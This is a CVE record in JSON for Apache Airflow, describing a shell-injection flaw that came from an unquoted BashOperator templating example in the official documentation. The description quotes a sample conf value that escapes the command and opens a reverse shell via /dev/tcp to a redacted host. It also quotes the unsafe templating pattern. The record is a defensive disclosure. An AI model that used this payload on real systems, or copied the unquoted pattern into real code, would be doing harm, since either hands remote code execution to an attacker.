{"dataType":"CVE_RECORD","dataVersion":"5.2","cveMetadata":{"cveId":"CVE-2026-42252","assignerOrgId":"f0158376-9dc2-43b6-827c-5f631a4d8d09","state":"PUBLISHED","assignerShortName":"apache","dateReserved":"2026-04-25T18:49:46.124Z","datePublished":"2026-06-01T07:51:19.018Z","dateUpdated":"2026-06-02T16:43:13.898Z"},"containers":{"cna":{"affected":[{"collectionURL":"https://pypi.python.org","defaultStatus":"unaffected","packageName":"apache-airflow","product":"Apache Airflow","vendor":"Apache Software Foundation","versions":[{"lessThan":"3.2.2","status":"affected","version":"3.0.0","versionType":"semver"}]}],"credits":[{"lang":"en","type":"finder","value":"anonymous"},{"lang":"en","type":"remediation developer","value":"Kevin Yang (sjyangkevin)"}],"descriptions":[{"lang":"en","supportingMedia":[{"base64":false,"type":"text/html","value":"Apache Airflow&#x27;s official documentation at `core-concepts/dag-run.html` (&quot;Passing Parameters when triggering Dags&quot;) showed a verbatim `BashOperator(bash_command=&quot;echo value: {{ dag_run.conf[&#x27;conf1&#x27;] }}&quot;)` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `&quot;; bash -i &gt;&amp; /dev/tcp/.../9999 0&gt;&amp;1; #&quot;` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release."}],"value":"Apache Airflow's official documentation at `core-concepts/dag-run.html` (\"Passing Parameters when triggering Dags\") showed a verbatim `BashOperator(bash_command=\"echo value: {{ dag_run.conf['conf1'] }}\")` example without any quoting / sanitization warning. Dag authors who copied the pattern verbatim into deployments where users had `Dag.can_trigger` permission on the affected Dag (typical multi-team deployments, hosted offerings exposing a trigger API) could be exposed to shell-metacharacter injection via the `conf` field of the trigger API: an authenticated trigger user could supply `\"; bash -i >& /dev/tcp/.../9999 0>&1; #\"` as a `conf` value and reach an `os.exec` on the worker. This CVE covers the documentation correction in `apache/airflow` PR 64129 — the pattern in the docs example now includes explicit shell-quoting and a safety caveat. Affects deployments whose Dag code was modeled on the pre-correction docs example. Same class as the prior CVE-2025-50213 and CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to `apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped with the release."}],"metrics":[{"other":{"content":{"text":"low"},"type":"Textual description of severity"}}],"problemTypes":[{"descriptions":[{"cweId":"CWE-1336","description":"CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine","lang":"en","type":"CWE"}]}],"providerMetadata":{"orgId":"f0158376-9dc2-43b6-827c-5f631a4d8d09","shortName":"apache","dateUpdated":"2026-06-01T07:51:19.018Z"},"references":[{"tags":["patch"],"url":"https://github.com/apache/airflow/pull/64129"},{"tags":["vendor-advisory"],"url":"https://lists.apache.org/thread/8f4sc0rfn154jprmnwtmlst4p9zfw3w7"}],"source":{"discovery":"UNKNOWN"},"title":"Apache Airflow: BashOperator Jinja2 injection via dag_run.conf — low-privilege user pattern","x_generator":{"engine":"airflow-s/generate_cve_json.py"}},"adp":[{"metrics":[{"cvssV3_1":{"scope":"UNCHANGED","version":"3.1","baseScore":9.1,"attackVector":"NETWORK","baseSeverity":"CRITICAL","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N","integrityImpact":"HIGH","userInteraction":"NONE","attackComplexity":"LOW","availabilityImpact":"NONE","privilegesRequired":"NONE","confidentialityImpact":"HIGH"}},{"other":{"type":"ssvc","content":{"timestamp":"2026-06-02T16:05:01.041622Z","id":"CVE-2026-42252","options":[{"Exploitation":"none"},{"Automatable":"yes"},{"Technical Impact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}}],"title":"CISA ADP Vulnrichment","providerMetadata":{"orgId":"134c704f-9b21-4f2e-91b3-4a467353bcc0","shortName":"CISA-ADP","dateUpdated":"2026-06-02T16:43:13.898Z"}}]}}